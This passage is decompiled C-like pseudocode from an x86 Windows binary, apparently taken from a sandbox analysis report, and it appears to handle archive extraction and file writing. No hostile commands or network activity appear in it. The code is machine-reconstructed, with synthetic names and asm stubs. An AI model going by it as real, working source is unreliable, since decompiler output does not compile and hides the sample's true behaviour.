                                                                                                                                                      																								__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                      																								if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                      																									__eflags = _a7;
                                                                                                                                                      																									if(_a7 == 0) {
                                                                                                                                                      																										L195:
                                                                                                                                                      																										E0040503B(_t640,  &_v4156);
                                                                                                                                                      																										__eflags = _a15;
                                                                                                                                                      																										if(_a15 != 0) {
                                                                                                                                                      																											_t394 = _t715 + 0x554;
                                                                                                                                                      																											 *_t394 =  *(_t715 + 0x554) + 1;
                                                                                                                                                      																											__eflags =  *_t394;
                                                                                                                                                      																										}
                                                                                                                                                      																										L197:
                                                                                                                                                      																										__eflags =  *((char*)(_t715 + 0x4ef));
                                                                                                                                                      																										if( *((char*)(_t715 + 0x4ef)) != 0) {
                                                                                                                                                      																											goto L202;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                      																										if( *((intOrPtr*)(_t716 + 4)) == 0xffffffff) {
                                                                                                                                                      																											goto L202;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _a7;
                                                                                                                                                      																										if(_a7 != 0) {
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                      																										if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                      																											L18:
                                                                                                                                                      																											E00401264(_t716);
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _v25;
                                                                                                                                                      																										if(_v25 != 0) {
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L202;
                                                                                                                                                      																									}
                                                                                                                                                      																									L143:
                                                                                                                                                      																									__eflags = _v25;
                                                                                                                                                      																									if(_v25 == 0) {
                                                                                                                                                      																										__eflags = _a11;
                                                                                                                                                      																										if(_a11 == 0) {
                                                                                                                                                      																											__eflags = _v20 - 0x50;
                                                                                                                                                      																											if(_v20 != 0x50) {
                                                                                                                                                      																												_t512 = E00405018( &_v4156);
                                                                                                                                                      																												__eflags = _t512;
                                                                                                                                                      																												if(_t512 != 0) {
                                                                                                                                                      																													E0040B282(_t716 + 0x17, E004098D0(0x406), _v12);
                                                                                                                                                      																													_t718 = _t718 + 0xc;
                                                                                                                                                      																													E00403432(0x414c7c, _t716 + 0x17, _v12);
                                                                                                                                                      																												}
                                                                                                                                                      																											}
                                                                                                                                                      																										}
                                                                                                                                                      																										_t273 = _t715 + 0x54c;
                                                                                                                                                      																										 *_t273 =  *(_t715 + 0x54c) + 1;
                                                                                                                                                      																										__eflags =  *_t273;
                                                                                                                                                      																									}
                                                                                                                                                      																									L149:
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x550)) =  *((intOrPtr*)(_t715 + 0x550)) + 1;
                                                                                                                                                      																									_t653 = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x510)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x514)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x518)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x51c)) = 0;
                                                                                                                                                      																									__eflags =  *(_t716 + 0x6d88);
                                                                                                                                                      																									 *(_t715 + 0x538) =  *(_t715 + 0x538) | 0xffffffff;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x534)) = (0 |  *(_t716 + 0x6d88) != 0x00000000) - 1;
                                                                                                                                                      																									_t456 =  *(_t716 + 0x46b0) & 0x0000ffff;
                                                                                                                                                      																									__eflags = _t456 & 0x00000004;
                                                                                                                                                      																									if((_t456 & 0x00000004) != 0) {
                                                                                                                                                      																										_t653 =  *(_t716 + 0x46c8) & 0x000000ff;
                                                                                                                                                      																									}
                                                                                                                                                      																									__eflags =  *(_t716 + 0x46c8) - 0x24;
                                                                                                                                                      																									asm("sbb dl, dl");
                                                                                                                                                      																									asm("sbb eax, eax");
                                                                                                                                                      																									E00408FEC(_t715 + 0x28, _t653, _t715 + 0x115c,  ~(_t456 & 0x400) & _t716 + 0x000052e4, 0, _t706 + 0x00000001 & 0x000000ff);
                                                                                                                                                      																									 *(_t715 + 0x48) =  *(_t716 + 0x5380);
                                                                                                                                                      																									 *(_t715 + 0x4c) =  *(_t716 + 0x5384);
                                                                                                                                                      																									E00408FCC(_t715 + 0x28, _t716,  &_v4156);
                                                                                                                                                      																									_t467 = _a11;
                                                                                                                                                      																									 *(_t715 + 0x51) = _t467;
                                                                                                                                                      																									 *((char*)(_t715 + 0x52)) = _v25;
                                                                                                                                                      																									__eflags = _t467;
                                                                                                                                                      																									if(_t467 != 0) {
                                                                                                                                                      																										L163:
                                                                                                                                                      																										 *(_t640 + 0x2900) =  *(_t640 + 0x29ba);
                                                                                                                                                      																										_v4137 = _t467 & 0xffffff00 |  *(_t640 + 0x2900) == 0x00000000;
                                                                                                                                                      																										if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                      																											L165:
                                                                                                                                                      																											_v16 = 0;
                                                                                                                                                      																											L166:
                                                                                                                                                      																											_push(_v16);
                                                                                                                                                      																											_push(_t715 + 0x534);
                                                                                                                                                      																											_push(_v12);
                                                                                                                                                      																											_push(_t716);
                                                                                                                                                      																											_push(_t715 + 0x28);
                                                                                                                                                      																											_t471 = E0040E1E4();
                                                                                                                                                      																											__eflags = _t471;
                                                                                                                                                      																											if(_t471 == 0) {
                                                                                                                                                      																												__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                      																												if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                      																													__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                      																													if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                      																														_t501 =  *((intOrPtr*)(_t715 + 0x548));
                                                                                                                                                      																														 *((intOrPtr*)(_t501 + 0x5760)) =  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                      																														 *(_t501 + 0x5764) =  *(_t716 + 0x538c);
                                                                                                                                                      																														 *((char*)(_t501 + 0x5778)) = 0;
                                                                                                                                                      																														__eflags =  *(_t716 + 0x46b0) >> 0x00000004 & 0x00000001;
                                                                                                                                                      																														E00411336( *(_t716 + 0x46c8) & 0x000000ff,  *(_t716 + 0x46b0) >> 0x00000004 & 1);
                                                                                                                                                      																													} else {
                                                                                                                                                      																														E00403974(_t640, _t715 + 0x28,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                      																													}
                                                                                                                                                      																												}
                                                                                                                                                      																											} else {
                                                                                                                                                      																												 *((char*)(_t715 + 0x11dd)) = _v16;
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                      																											if( *((intOrPtr*)(_t716 + 4)) != 0xffffffff) {
                                                                                                                                                      																												E00401264(_t716);
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags = _v25;
                                                                                                                                                      																											_v5 = 0;
                                                                                                                                                      																											if(_v25 != 0) {
                                                                                                                                                      																												L183:
                                                                                                                                                      																												__eflags = _a11;
                                                                                                                                                      																												if(_a11 != 0) {
                                                                                                                                                      																													goto L195;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _v20 - 0x58;
                                                                                                                                                      																												if(_v20 == 0x58) {
                                                                                                                                                      																													L186:
                                                                                                                                                      																													_push( *(_t716 + 0x46cc));
                                                                                                                                                      																													_t474 = E00403218();
                                                                                                                                                      																													__eflags = _t474;
                                                                                                                                                      																													if(_t474 != 0) {
                                                                                                                                                      																														goto L195;
                                                                                                                                                      																													}
                                                                                                                                                      																													__eflags =  *((intOrPtr*)(_t640 + 0x28c0)) - _t474;
                                                                                                                                                      																													if( *((intOrPtr*)(_t640 + 0x28c0)) != _t474) {
                                                                                                                                                      																														_t369 = _t716 + 0x46cc;
                                                                                                                                                      																														 *_t369 =  *(_t716 + 0x46cc) & 0xffffffdf;
                                                                                                                                                      																														__eflags =  *_t369;
                                                                                                                                                      																													}
                                                                                                                                                      																													__eflags = _v5;
                                                                                                                                                      																													if(_v5 == 0) {
                                                                                                                                                      																														L192:
                                                                                                                                                      																														asm("sbb edx, edx");
                                                                                                                                                      																														asm("sbb eax, eax");
                                                                                                                                                      																														asm("sbb eax, eax");
                                                                                                                                                      																														E0040538C( &_v4156,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334); // executed
                                                                                                                                                      																														E00404EF5( &_v4156);
                                                                                                                                                      																														asm("sbb ecx, ecx");
                                                                                                                                                      																														asm("sbb ecx, ecx");
                                                                                                                                                      																														E00405015(_t716 + 0x52ec,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                      																														__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                      																														if(__eflags == 0) {
                                                                                                                                                      																															E004057AA(__eflags,  &_v4133,  &_v3108,  *(_t716 + 0x46cc));
                                                                                                                                                      																														}
                                                                                                                                                      																														 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                      																														goto L195;
                                                                                                                                                      																													} else {
                                                                                                                                                      																														__eflags =  *(_t640 + 0x2900);
                                                                                                                                                      																														if( *(_t640 + 0x2900) == 0) {
                                                                                                                                                      																															goto L195;
                                                                                                                                                      																														}
                                                                                                                                                      																														E00405005( &_v4156);
                                                                                                                                                      																														goto L192;
                                                                                                                                                      																													}
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _v20 - 0x45;
                                                                                                                                                      																												if(_v20 != 0x45) {
                                                                                                                                                      																													goto L195;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L186;
                                                                                                                                                      																											} else {
                                                                                                                                                      																												_t491 =  *(_t716 + 0x6d88);
                                                                                                                                                      																												__eflags = _t491;
                                                                                                                                                      																												if(_t491 == 0) {
                                                                                                                                                      																													L178:
                                                                                                                                                      																													__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  !( *(_t716 + 0x46c0));
                                                                                                                                                      																													if( *((intOrPtr*)(_t715 + 0x534)) ==  !( *(_t716 + 0x46c0))) {
                                                                                                                                                      																														goto L183;
                                                                                                                                                      																													}
                                                                                                                                                      																													L179:
                                                                                                                                                      																													__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      																													_push( &_v1052);
                                                                                                                                                      																													if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                      																														_push(0x71);
                                                                                                                                                      																													} else {
                                                                                                                                                      																														_push(0x70);
                                                                                                                                                      																													}
                                                                                                                                                      																													E004098D0();
                                                                                                                                                      																													_push(_t716 + 0x17);
                                                                                                                                                      																													E0040B282();
                                                                                                                                                      																													_v5 = 1;
                                                                                                                                                      																													E00402C51(E0040321D(0x414c7c, 3));
                                                                                                                                                      																													goto L183;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  *(_t716 + 0x46c0);
                                                                                                                                                      																												if( *((intOrPtr*)(_t715 + 0x534)) ==  *(_t716 + 0x46c0)) {
                                                                                                                                                      																													goto L183;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _t491;
                                                                                                                                                      																												if(_t491 != 0) {
                                                                                                                                                      																													goto L179;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L178;
                                                                                                                                                      																											}
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _v25;
                                                                                                                                                      																										_v16 = 1;
                                                                                                                                                      																										if(_v25 == 0) {
                                                                                                                                                      																											goto L166;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L165;
                                                                                                                                                      																									} else {
                                                                                                                                                      																										__eflags =  *((intOrPtr*)(_t716 + 0x6d98)) - _t467;
                                                                                                                                                      																										if( *((intOrPtr*)(_t716 + 0x6d98)) != _t467) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										_t511 =  *(_t716 + 0x5380);
                                                                                                                                                      																										_t714 =  *(_t716 + 0x538c);
                                                                                                                                                      																										_t467 = _t511 << 0xb;
                                                                                                                                                      																										__eflags = ( *(_t716 + 0x5384) << 0x00000020 | _t511) << 0xb - _t714;
                                                                                                                                                      																										if(__eflags < 0) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										if(__eflags > 0) {
                                                                                                                                                      																											L156:
                                                                                                                                                      																											__eflags = _t714;
                                                                                                                                                      																											if(__eflags < 0) {
                                                                                                                                                      																												L162:
                                                                                                                                                      																												_t467 = E004054E3( &_v4156,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                      																												goto L163;
                                                                                                                                                      																											}
                                                                                                                                                      																											if(__eflags > 0) {
                                                                                                                                                      																												L159:
                                                                                                                                                      																												_t467 = E00405511(_t716, _t714, __eflags);
                                                                                                                                                      																												__eflags = _t714 -  *(_t716 + 0x5384);
                                                                                                                                                      																												if(__eflags < 0) {
                                                                                                                                                      																													goto L163;
                                                                                                                                                      																												}
                                                                                                                                                      																												if(__eflags > 0) {
                                                                                                                                                      																													goto L162;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _t467 -  *(_t716 + 0x5380);
                                                                                                                                                      																												if(_t467 <=  *(_t716 + 0x5380)) {
                                                                                                                                                      																													goto L163;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L162;
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags =  *((intOrPtr*)(_t716 + 0x5388)) - 0x5f5e100;
                                                                                                                                                      																											if(__eflags < 0) {
                                                                                                                                                      																												goto L162;
                                                                                                                                                      																											}
                                                                                                                                                      																											goto L159;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _t467 -  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                      																										if(_t467 <=  *((intOrPtr*)(_t716 + 0x5388))) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L156;
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								_push(1);
                                                                                                                                                      																								_push(0);
                                                                                                                                                      																								_push(0);
                                                                                                                                                      																								_v25 = 1;
                                                                                                                                                      																								_a11 = 1;
                                                                                                                                                      																								_a7 = 1;
                                                                                                                                                      																								_t520 = E0040BB2F(_t652,  &_v1052,  &_v6204);
                                                                                                                                                      																								__eflags = _t520;
                                                                                                                                                      																								if(_t520 != 0) {
                                                                                                                                                      																									goto L149;
                                                                                                                                                      																								}
                                                                                                                                                      																								_t641 = 0;
                                                                                                                                                      																								L123:
                                                                                                                                                      																								E0040503B(_t641,  &_v4156);
                                                                                                                                                      																								return _t641;
                                                                                                                                                      																							}
                                                                                                                                                      																							__eflags = _t524;
                                                                                                                                                      																							if(_t524 != 0) {
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_t527 = E00404CB2(_t706, _t640,  &_v4156, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4))); // executed
                                                                                                                                                      																							__eflags = _t527;
                                                                                                                                                      																							if(_t527 != 0) {
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_a7 = _t527;
                                                                                                                                                      																							__eflags = _v5 - _t527;
                                                                                                                                                      																							if(_v5 != _t527) {
                                                                                                                                                      																								goto L139;
                                                                                                                                                      																							}
                                                                                                                                                      																							E0040339C(_t716 + 0x17, _v12);
                                                                                                                                                      																							_t652 = 0x414c7c;
                                                                                                                                                      																							E0040321D(0x414c7c, 9);
                                                                                                                                                      																							_t531 = E00407913(_v12);
                                                                                                                                                      																							__eflags = _t531;
                                                                                                                                                      																							if(_t531 != 0) {
                                                                                                                                                      																								goto L139;
                                                                                                                                                      																							}
                                                                                                                                                      																							_push(E004098D0(0x456));
                                                                                                                                                      																							_push(_t716 + 0x17);
                                                                                                                                                      																							E0040B282();
                                                                                                                                                      																							E0040DBC0( &_v7228, _v12, 0x400);
                                                                                                                                                      																							E0040797C(_v12, 1);
                                                                                                                                                      																							E004058C1(_t640, _t716, _v12, 0, 1);
                                                                                                                                                      																							_t541 = E00404CB2(_t706, _t640,  &_v4156, _v12, 0,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                      																							__eflags = _t541;
                                                                                                                                                      																							if(_t541 == 0) {
                                                                                                                                                      																								_t652 = 0x414c7c;
                                                                                                                                                      																								E0040339C(_t716 + 0x17, _v12);
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_a7 = 1;
                                                                                                                                                      																							goto L143;
                                                                                                                                                      																						} else {
                                                                                                                                                      																							__eflags = _v20 - 0x58;
                                                                                                                                                      																							if(_v20 != 0x58) {
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							goto L130;
                                                                                                                                                      																						}
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags = _a7;
                                                                                                                                                      																					if(_a7 == 0) {
                                                                                                                                                      																						L124:
                                                                                                                                                      																						E0040503B(_t640,  &_v4156);
                                                                                                                                                      																						goto L19;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags = _v20 - 0x50;
                                                                                                                                                      																					if(_v20 == 0x50) {
                                                                                                                                                      																						goto L124;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags = _v20 - 0x45;
                                                                                                                                                      																					if(_v20 == 0x45) {
                                                                                                                                                      																						goto L124;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                      																					if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                      																						goto L124;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags = _v25;
                                                                                                                                                      																					if(_v25 != 0) {
                                                                                                                                                      																						goto L124;
                                                                                                                                                      																					}
                                                                                                                                                      																					 *(_t715 + 0x54c) =  *(_t715 + 0x54c) + 1;
                                                                                                                                                      																					__eflags =  *(_t640 + 0x29ba);
                                                                                                                                                      																					if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                      																						goto L124;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                      																					__eflags = E0040585A( *((char*)(_t640 + 0x2959)), _v12, _v16, (_t523 & 0xffffff00 |  *((char*)(_t640 + 0x2959)) == 0x00000000) & 0x000000ff,  *(_t716 + 0x46cc));
                                                                                                                                                      																					if(__eflags == 0) {
                                                                                                                                                      																						L118:
                                                                                                                                                      																						 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                      																						L120:
                                                                                                                                                      																						__eflags =  *((char*)(_t715 + 0x11dd));
                                                                                                                                                      																						if( *((char*)(_t715 + 0x11dd)) != 0) {
                                                                                                                                                      																							asm("sbb eax, eax");
                                                                                                                                                      																							asm("sbb eax, eax");
                                                                                                                                                      																							asm("sbb eax, eax");
                                                                                                                                                      																							__eflags =  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec;
                                                                                                                                                      																							E00405A1F( ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec, _v12, _v16,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                      																						}
                                                                                                                                                      																						_t641 = 1;
                                                                                                                                                      																						goto L123;
                                                                                                                                                      																					}
                                                                                                                                                      																					_t558 = E0040572E(__eflags, _v12, _v16);
                                                                                                                                                      																					_a7 = _t558;
                                                                                                                                                      																					__eflags = _t558;
                                                                                                                                                      																					if(__eflags != 0) {
                                                                                                                                                      																						_t570 = E00405765(E0040577D(__eflags, _v12, _v16));
                                                                                                                                                      																						__eflags = _t570;
                                                                                                                                                      																						if(_t570 == 0) {
                                                                                                                                                      																							E00404CB2(_t706, _t640, 0, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_a7,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                      																							_a7 = 0;
                                                                                                                                                      																						}
                                                                                                                                                      																					}
                                                                                                                                                      																					_t559 = E004058C1(_t640, _t716, _v12, _v16, 1);
                                                                                                                                                      																					__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                      																					_t562 = E0040585A( *((char*)(_t640 + 0x2959)), _v12, _v16, (_t559 & 0xffffff00 |  *((char*)(_t640 + 0x2959)) == 0x00000000) & 0x000000ff,  *(_t716 + 0x46cc));
                                                                                                                                                      																					__eflags = _t562;
                                                                                                                                                      																					if(_t562 != 0) {
                                                                                                                                                      																						__eflags = _a7;
                                                                                                                                                      																						if(_a7 == 0) {
                                                                                                                                                      																							E00402C51(E0040B282(_t716 + 0x17, E004098D0(0x6f), _v12));
                                                                                                                                                      																							E0040321D(0x414c7c, 9);
                                                                                                                                                      																							goto L120;
                                                                                                                                                      																						}
                                                                                                                                                      																						__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                      																						if(__eflags == 0) {
                                                                                                                                                      																							E004057AA(__eflags, _v12, _v16,  *(_t716 + 0x46cc));
                                                                                                                                                      																						}
                                                                                                                                                      																					}
                                                                                                                                                      																					goto L118;
                                                                                                                                                      																				}
                                                                                                                                                      																			}
                                                                                                                                                      																			L94:
                                                                                                                                                      																			_a7 = 0;
                                                                                                                                                      																			goto L95;
                                                                                                                                                      																		}
                                                                                                                                                      																		_t580 = E0040E18B( &_v8392, __eflags, _t716 + 0x52ec);
                                                                                                                                                      																		__eflags = _t580;
                                                                                                                                                      																		if(_t580 == 0) {
                                                                                                                                                      																			goto L95;
                                                                                                                                                      																		}
                                                                                                                                                      																		__eflags = _v8396;
                                                                                                                                                      																		if(_v8396 == 0) {
                                                                                                                                                      																			goto L94;
                                                                                                                                                      																		}
                                                                                                                                                      																		__eflags = E0040E12B( &_v8392, _t706, _t715);
                                                                                                                                                      																		goto L93;
                                                                                                                                                      																	}
                                                                                                                                                      																	__eflags = _v20 - 0x58;
                                                                                                                                                      																	if(_v20 != 0x58) {
                                                                                                                                                      																		goto L95;
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L88;
                                                                                                                                                      																}
                                                                                                                                                      																__eflags =  *((char*)(_t640 + 0x28c5));
                                                                                                                                                      																if( *((char*)(_t640 + 0x28c5)) == 0) {
                                                                                                                                                      																	goto L95;
                                                                                                                                                      																}
                                                                                                                                                      																goto L86;
                                                                                                                                                      															}
                                                                                                                                                      															__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                      															_a7 = 1;
                                                                                                                                                      															if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                      																goto L84;
                                                                                                                                                      															}
                                                                                                                                                      															goto L83;
                                                                                                                                                      														}
                                                                                                                                                      														_t582 = _t640 + 0xc10;
                                                                                                                                                      														__eflags =  *_t582;
                                                                                                                                                      														if( *_t582 == 0) {
                                                                                                                                                      															E0040E218(_t640 + 0x810, _t715 + 0x15de, 0x1000000);
                                                                                                                                                      														} else {
                                                                                                                                                      															E0040E40C(_t715 + 0x15de, _t582);
                                                                                                                                                      														}
                                                                                                                                                      														__eflags = _a7;
                                                                                                                                                      														if(_a7 != 0) {
                                                                                                                                                      															__eflags = 0;
                                                                                                                                                      															 *(_t715 + 0x15de) = 0;
                                                                                                                                                      														}
                                                                                                                                                      														__eflags = _v20 - 0x45;
                                                                                                                                                      														if(_v20 == 0x45) {
                                                                                                                                                      															L75:
                                                                                                                                                      															_t587 = E0040740B( &_v6204);
                                                                                                                                                      															goto L76;
                                                                                                                                                      														} else {
                                                                                                                                                      															__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                      															if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                      																goto L75;
                                                                                                                                                      															}
                                                                                                                                                      															_t587 =  &_v6204;
                                                                                                                                                      															L76:
                                                                                                                                                      															E0040E451(_t715 + 0x15de, _t587);
                                                                                                                                                      															__eflags = _a7;
                                                                                                                                                      															if(_a7 != 0) {
                                                                                                                                                      																__eflags =  *((short*)(_t715 + 0x15e0)) - 0x5f;
                                                                                                                                                      																if( *((short*)(_t715 + 0x15e0)) == 0x5f) {
                                                                                                                                                      																	_t591 = E0040728F( *(_t715 + 0x15e2) & 0x0000ffff);
                                                                                                                                                      																	__eflags = _t591;
                                                                                                                                                      																	if(_t591 != 0) {
                                                                                                                                                      																		_t592 = 0x3a;
                                                                                                                                                      																		 *((short*)(_t715 + 0x15e0)) = _t592;
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      															goto L81;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 2;
                                                                                                                                                      													if( *((intOrPtr*)(_t640 + 0x28c8)) == 2) {
                                                                                                                                                      														goto L60;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t441 =  &_v1052;
                                                                                                                                                      														goto L61;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												__eflags = _v20 - 0x58;
                                                                                                                                                      												if(_v20 != 0x58) {
                                                                                                                                                      													goto L59;
                                                                                                                                                      												}
                                                                                                                                                      												_t600 = E004072A7(0x3a);
                                                                                                                                                      												__eflags = _t600;
                                                                                                                                                      												if(_t600 == 0) {
                                                                                                                                                      													goto L59;
                                                                                                                                                      												} else {
                                                                                                                                                      													_a7 = 1;
                                                                                                                                                      													 *_v12 = 0;
                                                                                                                                                      													goto L56;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											_t602 = _t715 + 0x115c;
                                                                                                                                                      											__eflags =  *_t602;
                                                                                                                                                      											if( *_t602 != 0) {
                                                                                                                                                      												goto L52;
                                                                                                                                                      											}
                                                                                                                                                      											_t604 = E00402C52(1,  &_v1052, _t602, 0x80);
                                                                                                                                                      											__eflags = _t604;
                                                                                                                                                      											if(_t604 != 0) {
                                                                                                                                                      												goto L52;
                                                                                                                                                      											} else {
                                                                                                                                                      												_push(0);
                                                                                                                                                      												E0040AE33();
                                                                                                                                                      												E0040AE33(E004098D0(0x73),  &_v1052);
                                                                                                                                                      												 *((char*)(_t715 + 0x1dde)) = 1;
                                                                                                                                                      												goto L202;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										_t431 =  *((intOrPtr*)(_t716 + 0x6d89));
                                                                                                                                                      										_v25 = _t431;
                                                                                                                                                      										__eflags = _t431;
                                                                                                                                                      										if(_t431 == 0) {
                                                                                                                                                      											goto L197;
                                                                                                                                                      										}
                                                                                                                                                      										goto L47;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *(_t640 + 0x2e7c) - 1;
                                                                                                                                                      									if( *(_t640 + 0x2e7c) <= 1) {
                                                                                                                                                      										goto L45;
                                                                                                                                                      									}
                                                                                                                                                      									L44:
                                                                                                                                                      									_a15 = 0;
                                                                                                                                                      									goto L45;
                                                                                                                                                      								}
                                                                                                                                                      								_t609 =  *(_t640 + 0x2e7c);
                                                                                                                                                      								__eflags = _t609 - 1;
                                                                                                                                                      								if(_t609 == 1) {
                                                                                                                                                      									goto L45;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v21;
                                                                                                                                                      								if(_v21 != 0) {
                                                                                                                                                      									goto L45;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = _t609;
                                                                                                                                                      									if(_t609 == 0) {
                                                                                                                                                      										_a15 = _t609;
                                                                                                                                                      									}
                                                                                                                                                      									_t612 = E00407A4E( &_v1052,  &_v6204, 0);
                                                                                                                                                      									__eflags =  *(_t640 + 0x2e7c) - 1 - _t612;
                                                                                                                                                      									if( *(_t640 + 0x2e7c) - 1 != _t612) {
                                                                                                                                                      										goto L44;
                                                                                                                                                      									} else {
                                                                                                                                                      										E00407A4E( &_v1052,  &_v6204, 1);
                                                                                                                                                      										goto L45;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_t627 = E0040E3F2();
                                                                                                                                                      							_v5 = 1;
                                                                                                                                                      							__eflags = _t627;
                                                                                                                                                      							if(_t627 != 0) {
                                                                                                                                                      								goto L30;
                                                                                                                                                      							}
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						_t628 =  *((intOrPtr*)(_t640 + 0x4acc));
                                                                                                                                                      						__eflags =  *(_t715 + 0x554) -  *((intOrPtr*)(_t628 + 0x30));
                                                                                                                                                      						if( *(_t715 + 0x554) <  *((intOrPtr*)(_t628 + 0x30))) {
                                                                                                                                                      							goto L24;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *((char*)(_t715 + 0x559));
                                                                                                                                                      						if( *((char*)(_t715 + 0x559)) != 0) {
                                                                                                                                                      							goto L202;
                                                                                                                                                      						}
                                                                                                                                                      						goto L24;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t404 - 0x76;
